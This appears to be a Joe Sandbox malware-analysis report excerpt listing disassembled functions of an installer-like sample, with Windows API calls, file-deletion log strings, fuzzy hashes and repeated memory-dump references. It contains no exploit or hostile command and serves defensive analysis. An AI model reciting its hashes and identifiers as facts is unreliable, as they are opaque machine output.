                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                  • String ID: HideWindow
                                                                                                                                                                                  • API String ID: 1249568736-780306582
                                                                                                                                                                                  • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                  • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                  Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                  • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                  Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                  • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                  • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                  Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                  • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                  • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                  Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                  • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                  • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                  Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4115351271-0
                                                                                                                                                                                  • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                  • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                  Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                  • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                  Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                  • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                  • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                  Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                  • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                  • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                  Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                  • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                  • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                  • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                  • String ID: $ @$M$N
                                                                                                                                                                                  • API String ID: 1638840714-3479655940
                                                                                                                                                                                  • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                  • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                  Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                  • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                  • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \*.*, xrefs: 00406D2F
                                                                                                                                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
